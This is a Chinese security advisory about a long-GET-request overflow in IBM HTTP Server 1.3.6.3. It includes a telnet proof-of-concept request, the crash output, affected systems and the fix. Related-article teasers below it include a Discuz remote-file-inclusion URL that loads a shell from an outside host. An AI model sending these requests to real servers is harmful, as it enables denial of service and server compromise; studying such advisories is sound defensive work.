IBM HTTP Server 远程溢出漏洞
涉及程序:
GET
描述:
通过提交超长的GET请求导致IBM HTTP Server远程溢出
详细:
IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。
如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
$ telnet target 80
GET /......(216个".")aaa HTTP/1.0
则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目标主机运行在Windows 2000下。
受影响的系统
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2
解决方案:
IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html
相关推荐
-
IBM HTTP Server 远程溢出漏洞
涉及程序: GET 描述: 通过提交超长的GET请求导致IBM HTTP Server远程溢出 详细: IBM 的 HTTP 服务器是一个 web 服务器.在 Windows NT 使用的版本中存在拒绝服务的漏洞. 如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错.要恢复服务正常工作需要重新启动应用程序.成功的利用该漏洞,攻击者可在受害的主机上执行任何代码.(但这还未得到完全证实.) 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负 $ teln
-
我是如何发现CCProxy远程溢出漏洞的
CCProxy是一个国产的支持HTTP.FTP.Gopher.SOCKS4/5.Telnet.Secure(HTTPS).News(NNTP). RTSP.MMS等代理协议的代理服务器软件.因为其简单易用.界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件,有时候我在公司上网也要用它做代理.前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码. TIPS:什么是Gopher.RTSP.MMS? Gopher是
-
诱人视频请君入瓮 解析RealPlayer溢出漏洞
有这样一种视频,它极其诱人,你无法抗拒它的诱惑,点击.在一阵等待之后,你会觉察到刚才看到的只是"海市蜃楼",此时,你已身处深不见底的"瓮"中. RealPlayer是大家常用的媒体播放器,用户非常多,因此它一旦出现漏洞,必定会有很多人遭到攻击.以前RealPlayer Server就曾爆出过一个远程溢出漏洞,使得许多影视网站遭到攻击.如今,当大家已淡忘上次的漏洞灾害所带来的痛苦时,新版RealPlayer中又出现了溢出漏洞. 现在,众多"黑客"已
-
php5系列的apache远程执行漏洞攻击脚本
php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用... 复制代码 代码如下: /* Apache Magica by Kingcope *//* gcc apache-magika.c -o apache-magika -lssl *//* This is a code execution bug in the combination of Apache and PHP.On debian and Ubuntu the vulnerability is presen
-
discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy
-
PHP5.2下chunk_split()函数整数溢出漏洞 分析
受影响系统:PHP PHP < 5.2.3不受影响系统:PHP PHP 5.2.3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 24261CVE(CAN) ID: CVE-2007-2872 PHP是一种流行的WEB服务器端编程语言. PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限. PHP中
-
Android系统进程间通信(IPC)机制Binder中的Client获得Server远程接口过程源代码分析
在上一篇文章中,我们分析了Android系统进程间通信机制Binder中的Server在启动过程使用Service Manager的addService接口把自己添加到Service Manager守护过程中接受管理.在这一篇文章中,我们将深入到Binder驱动程序源代码去分析Client是如何通过Service Manager的getService接口中来获得Server远程接口的.Client只有获得了Server的远程接口之后,才能进一步调用Server提供的服务. 这里,我们仍然是通过A
-
SQL Server 远程更新目标表数据的存储过程
本文给大家分享一个远程更新目标库数据的存储过程,适用于更新列名一致,主键为Int类型,可远程链接的数据库. USE [Table]--切换到源表,就是数据最新的那个表 GO /****** Object: StoredProcedure [dbo].[proc_DataUpdate] Script Date: 2018/5/4 15:08:56 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO -- ================
-
PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
漏洞说明 不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析. 软件下载: https://www.exploit-db.com/apps/f8fb5676b6a32f7be1c8d8
-
SQL Server远程连接的设置步骤(图文)
SQL Server正常连接时,若不需要远程操控其他电脑,可以用Windows身份验证模式,但是涉及到远程处理时,需要通过SQL Server身份验证登录.具体操作如下. 首先,我们在登录时,选择Windows身份验证,然后连接到服务器. 进入到登录主页面后,右击当前的对象资源管理器,选择属性,弹出如下图所示的页面,选择安全性,将服务器身份验证勾选为SQL Server和Windows身份验证模式,(若在安装软件时已选择第二种验证模式,可直接通过账号登录)如图2所示. 图2. 图3. 如图3所示
随机推荐
- Ext javascript建立超链接,进行事件处理的实现方法
- javascript面向对象编程代码
- 让 Asp 与 XML 交互
- js对象的构造和继承实现代码
- Android动画之补间动画(Tween Animation)实例详解
- 升级SQL Server 2014的四个要点要注意
- 学习JavaScript设计模式之迭代器模式
- Javascript将数值转换为金额格式(分隔千分位和自动增加小数点)
- 举例初步讲解Ruby中的正则表达式
- MySQL的字符集操作命令总结
- 让图片旋转任意角度及JQuery插件使用介绍
- jquery api参考 visualjquery 中国线路 速度快
- JavaScript fontcolor方法入门实例(按照指定的颜色来显示字符串)
- 深入理解JavaScript系列(12) 变量对象(Variable Object)
- HTTP 499 状态码 nginx下 499错误的解决办法
- Java实现较大二进制文件的读、写方法
- JavaScript国旗变换效果代码
- Android实现伸缩弹力分布菜单效果的示例
- iOS利用UITableView设置全屏分隔线的3种方法总结
- python 使用socket传输图片视频等文件的实现方式